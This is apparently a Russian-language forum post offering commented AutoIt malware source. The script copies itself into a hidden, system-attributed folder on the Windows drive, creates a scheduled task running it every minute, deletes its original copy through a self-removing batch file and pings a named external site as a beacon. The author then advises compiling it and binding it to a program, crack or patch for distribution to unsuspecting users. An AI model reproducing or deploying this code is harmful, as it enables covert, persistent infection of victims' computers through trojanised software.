Появилось не много свободного времени,в принципе времени не много ,поэтому напишу то что просил aza здесь, здесь,вообщем раз уж не хватает,но ему сильно хочется думаю можно помочь.
Как я понял функция у вируса должна быть одна,это отстукивать на одну ссылку один или два раза,или сколько там,в принципе хоть через каждую минуту долбить)
Что бы особо не заморачиваться будем использовать schtasks для создания расписания запуска вируса,для создания этого правила нужно будет обладать правами администратора,всё остольно будет написано исключительно на autoit,так проще.
Сам скрипт будет ниже,ну и пояснения будет в самом скрипте(постараюсь раскоменнтировать каждую строку,ну если не каждую то большую часть скрипта).
Скрипт создаст папку в корне диска на котором установлена Windows,потом скопирует себя в эту папку,поставит атрибуты скрытый и системный на папку с скомпилированным скриптом,создаст правило schtasks которое будет запускать скрипт ,удалить сам себя с места откуда он был запущен(если это конечно не конечная папка).
;{инклудим нужные библиотеки
#Include <File.au3>
#include <inet.au3>
#Include <process.au3>
;}
;{проверяем наличия файла,если файл есть то сравниваем место нахождения самого себя с конечным файлом,если пути не совпадают,то скрипт самоудаляется,если же нет,то отстукивает на указанную ссылку,если же файла нету,то скрипт копирует сам себя в конечную папку и удаляет себя с места от куда был запущен.
;}
if FileExists(@HomeDrive&"\drive\satur.exe" ) then ; проверяем наличия файла в папке %homedrive%\drive,если файл с именем satur.exe существует,то
$flour=String(@ScriptFullPath); обозначаем переменную $flour в строку,которая будет обозначать место запуска файла
$dras=String(@HomeDrive&"\drive\satur.exe");обозначаем переменную $dras в строку которая будет обозначать конечного файла
if StringCompare($flour,$dras) then ;сравниваем строки( на другом языке я бы написал проще,но на autoit мне показался это самый простой выход),если они не совпадают то
_ScriptDestroy() ; запускаем функцию самоудаления
Else ;если совпадают то
_ping() ;запускаем функцию отстука,которая будет тупа пинговать нужную нам ссылку.
EndIf
Else ;если файла не существует то
_copypast() ; запускаем функцию копирования
endif
Func _ScriptDestroy() ;функция самоудаления
_ping() ; запускаем функцию отстука,хотя можно и удалить эту строчку.
$sTemp = _TempFile(@TempDir, '~', '.bat')
$sPath = FileGetShortName(@ScriptFullPath)
$hFile = FileOpen($sTemp, 2)
FileWriteLine($hFile, '@echo off')
FileWriteLine($hFile, ':loop')
FileWriteLine($hFile, 'del ' & $sPath)
FileWriteLine($hFile, 'if exist ' & $sPath & ' goto loop')
FileWriteLine($hFile, 'del ' & $sTemp)
FileClose($hFile)
Run($sTemp, '', @SW_HIDE)
EndFunc ;==>_ScriptDestroy
func _copypast() ;функцию копирования
DirCreate(@HomeDrive&"\drive") ; создали папку в корне диска
filecopy(@ScriptFullPath,@HomeDrive&"\drive\satur.exe" ) ; скопировали сами себя в созданную папку и заодно переименовали
_RunDOS("schtasks /create /tn Partner /sc MINUTE /mo 1 /tr %homedrive%\drive\satur.exe /f") ; создаёт правило schtasks которое будет запускать наш вирус,вот здесь редактируем правило так как нужно,то есть когда нужно запускать и т.д.,вообщем в КМД schtasks /create /?
FileSetAttrib(@HomeDrive&"\drive","+SH") ; поставили атрибуты
run(@HomeDrive&'\drive\satur.exe','',@SW_HIDE ) ;запустили скопированный файл
_ScriptDestroy() ;запустили функцию самоудаления
EndFunc
func _ping() ;функция отстука,
Ping("www.thehackword.ru",250) ; тупа пингуем указанную ссылку
Exit ; завершаем выполнения скрипта.
EndFuncКомпилим данный скрипт в exe,склеиваем при помощи smart install marker с какой нибудь программой или кряком,патчем или ещё чем и распространяем.
